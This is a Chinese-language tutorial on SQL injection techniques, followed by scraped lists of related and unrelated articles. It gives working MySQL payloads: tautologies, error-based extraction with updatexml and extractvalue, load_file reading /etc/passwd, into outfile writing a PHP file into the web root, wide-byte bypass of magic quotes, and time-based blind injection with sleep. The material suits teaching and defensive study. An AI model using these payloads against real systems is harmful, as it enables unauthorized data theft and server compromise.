先看一个sql语句:

select * from admin where username='(此处为用户输入的数据)';

在没有任何过滤的情况下,如果用户输入:' or 1=1 --

这条语句就为:select * from admin where username='' or 1=1 --';

可见,语句执行永远为真。此时就进行了sql注入。

SQL注入有如下分类:

一、数字型注入

初始参数为:id=1

可以构造:id=1 or 1=1 (语句执行永远为真)

id=1 and 1=2 (语句执行永远为假)

id=1' (语句执行会出错)

数字型注入较为简单,而且一般在PHP,ASP等弱类型语言中存在,而对于Java,C#等强类型语言一般不存在。

二、字符型注入

字符型注入首先想到的是闭合单引号。

不难想到:id=1' and 1=2 --

-- 是注释后边的语句。

三、其他注入

sql注入其实可以说就是字符型注入和数字型注入。

还有一些常见的注入,如:

POST注入:注入字段在POST数据中。

Cookie注入:注入字段在Cookie字段中。

延时注入:使用数据库延时特性注入。

base64注入:注入字符串需要经过base64加密。

四、Mysql特性

mysql是一种数据库。

(1)三种注释:

#:注释从“#”字符到行尾。

--:注释“-- ”序列到行尾。注意:“-- ”后面要加一个空格。

/**/:注释/*  XXXX */中间的字符。

/**/注释存在一个特点:select id /*!55555,username*/ from users

语句正常执行。/*!55555,username*/的意思是若Mysql版本号高于或者等于5.55.55,语句将会被执行。如果“!”后面不加入版本号,将直接执行sql语句。

(2)mysql函数利用

load_file()函数读文件

读取文件,文件必须在服务器上,文件必须为绝对路径,必须有权限,文件容量小于         max_allowed_packet字节(默认为16MB,最大为1GB),如:

union select 1,load_file('/etc/passwd'),3,4,5,6 #

绕过单引号:union select 1,load_file(字符串转换为十六进制),3,4,5,6 #

union select 1,load_file(char(XX,XX,XX........)),3,4,5,6 #   ascii码

into outfile写文件操作

必须持有权限,文件名为绝对路径。

如:select '<?php phpinfo(); ?>' into file 'c:\wwwroot\1.php'

绕过单引号:select char(XX,XX,XX.......) into file 'c:\wwwroot\1.php'

concat 连接字符串

concat(user(),0x2c,database())

concat_ws(0x2c,user(),database())       0x2c是 逗号的16进制。

五、Mysql报错注入

(1)updatexml

select * from admin where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);

结果返回一个错误:'|5.1.50-community-log'

(2)extractvalue

select * from admin where id=1 and extractvalue(1,concat(0x7c,(select user())));

结果返回一个错误:'|root@localhost'

(3)floor

select * from admin where id = 1 union select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b

结果返回:Duplicate entry '1root@localhost' for key 'group_key'

六、宽字节注入

如果PHP开启了魔术引号,就会将单引号,双引号,反斜杠和NULL字符加上反斜杠转义。

如:id='   会输出    \'

这时我们可以使用宽字节注入:id=%d5'     输出:誠'   注入成功。

我们将  誠 进行url编码:%d5%5c

而 \的url编码为:%5c   可见 ,繁体字将反斜杠吃掉了。这就是宽字节注入的原理。

七、长字符截断

原理很简单。

比如在数据库创建三个如下用户:

admin   (有三个空格)

admin     (有五个空格)

admin       (有七个空格)

三个用户名长度不一样,但是如果 查询admin用户名,三个用户名都会被查询到。

假设后台语句是:

select count(*) from users where username='admin' and password='******';

这是存在安全问题的,如果用户创建一个“admin          ”用户,即可轻易进入后台,著名的wordpress就被这样的方式攻击过。

八、延时注入

基于时间差异的盲注手段。延时注入需要用到sleep()函数。

如:select * from users where id = 1 and sleep(3)    #三秒后执行sql语句。

也可以判断是否存在注入:url+id=1 and sleep(3)  页面三秒左右打开,则存在注入。

通常 会采用和 if 函数 搭配使用,进行爆破字符串。

如: and if(hex(mid(user(),L,1)))=N,sleep(3),1)

L的位置代表字符串的第几个字符,N代表ASCII码。

执行成功,则三秒左右返回页面,否则,和原来相同。

ps:坚持,努力,为梦想奋斗。

浅谈SQL注入的更多相关文章

  1. 浅谈SQL注入风险 - 一个Login拿下Server

    前两天,带着学生们学习了简单的ASP.NET MVC,通过ADO.NET方式连接数据库,实现增删改查. 可能有一部分学生提前预习过,在我写登录SQL的时候,他们鄙视我说:“老师你这SQL有注入,随便都 ...

  2. 浅谈SQL注入风险 - 一个Login拿下Server(转)

    前两天,带着学生们学习了简单的ASP.NET MVC,通过ADO.NET方式连接数据库,实现增删改查. 可能有一部分学生提前预习过,在我写登录SQL的时候,他们鄙视我说:“老师你这SQL有注入,随便都 ...

  3. 【sql注入】浅谈sql注入中的Post注入

    [sql注入]浅谈sql注入中的Post注入 本文来源:i春秋学院 00x01在许多交流群中,我看见很多朋友对于post注入很是迷茫,曾几何,我也是这样,因为我们都被复杂化了,想的太辅助了所以导致现在 ...

  4. 浅谈SQL注入漏洞以及防范策略

    --HeShiwei 2014-5-15 什么是SQL注入 SQL注入,指的是用户通过向登录框输入恶意字符,利用代码的字符串拼接漏洞进行网站注入攻击,最终导致整个网站用户表信息泄露的攻击方式.黑客就是 ...

  5. 浅谈 SQL 注入(注入篇)

    一.SQL注入简介 1.1 什么是SQL注入 在用户可控制的参数上过滤不严或没有任何限制,使得用户将传入的参数(如URL,表单,http header)与SQL语句合并构成一条 SQL语句传递给web ...

  6. 转【】浅谈sql中的in与not in,exists与not exists的区别_

    浅谈sql中的in与not in,exists与not exists的区别   1.in和exists in是把外表和内表作hash连接,而exists是对外表作loop循环,每次loop循环再对内表 ...

  7. 浅谈sql中的in与not in,exists与not exists的区别

    转 浅谈sql中的in与not in,exists与not exists的区别   12月12日北京OSC源创会 —— 开源技术的年终盛典 »   sql exists in 1.in和exists ...

  8. 浅谈sql 、linq、lambda 查询语句的区别

    浅谈sql .linq.lambda 查询语句的区别 LINQ的书写格式如下: from 临时变量 in 集合对象或数据库对象 where 条件表达式 [order by条件] select 临时变量 ...

  9. 浅谈SQL优化入门:3、利用索引

    0.写在前面的话 关于索引的内容本来是想写的,大概收集了下资料,发现并没有想象中的简单,又不想总结了,纠结了一下,决定就大概写点浅显的,好吧,就是懒,先挖个浅坑,以后再挖深一点.最基本的使用很简单,直 ...

随机推荐

  1. CSS字体样式属性

    font-size 字号大小 一般推荐使用相对长度(px ,em),不推荐使用绝对长度(in,cmm,mm,pt) font-family 字体 1.可以同时指定多个字体,中间用英文状态的逗号隔开,英 ...

  2. 在centos7上编译安装nginx

    题前,先放一个有图有真相的博客链接:https://www.cnblogs.com/zhang-shijie/p/5294162.html 虽然别人说的很详细,但还是记录一下 1.VMWare Wor ...

  3. Android gradle实现多渠道号打包

    在build.gradle中添加 productFlavors{ LETV { applicationId "×××××××××××" //包名   buildConfigFiel ...

  4. Android 直接修改dex破解

    直接修改dex破解 一.编写一个简单的验证程序 (1)MainActivity: protected void onCreate(BundlesavedInstanceState) { super.o ...

  5. 「Android」adb调试源码(针对dumpsys SurfceFlinger、trace.txt获取)

    首先对ADB作简单的阐述,接下来对adb shell dumpsys SurfaceFlinger服务的dump信息的查看.以及ANR问题如何获取trace文件并简单分析. -×*********** ...

  6. 取消IE、Office、Wmp首次开启提示

    一.取消IE首次开启提示 1.运行框输入gpedit.msc.打开组策略配置 2.本地计算机策略-计算机配置-管理模板-windows组件-Internet Explorer,查找右边“阻止执行首次运 ...

  7. 产品经理说| AIOps 让告警变得更智能 (下)

    AIOps 人工智能和IT运营支撑 Ops 之间的故事,愈演愈烈,已经成为当今运维圈的热门话题,我打算从2篇文档分享我们在 AIOps 上一些探索和实践.(上篇)主要介绍了为什么事件(告警)处理需要 ...

  8. The log scan number (620023:3702:1) passed to log scan in database 'xxxx' is not valid

    昨天一台SQL Server 2008R2的数据库在凌晨5点多抛出下面告警信息: The log scan number (620023:3702:1) passed to log scan in d ...

  9. Linux如何查看YUM的安装目录

    Linux下如何查看使用YUM安装过的包的安装路径呢? 在搞清楚这个问题前,我们先来了解一下YUM. YUM(全称为 Yellow dog Updater, Modified)是一个在Fedora和R ...

  10. SpringBoot集成spring-data-jpa注入Bean失败

    当项目结构正常(spring管理的Bean在SrpingBoot启动类平级或下级,支持spring扫描时),实现类上加 @Service注解,在实现类中注入dao层的Bean时,项目无法启动,无法找到 ...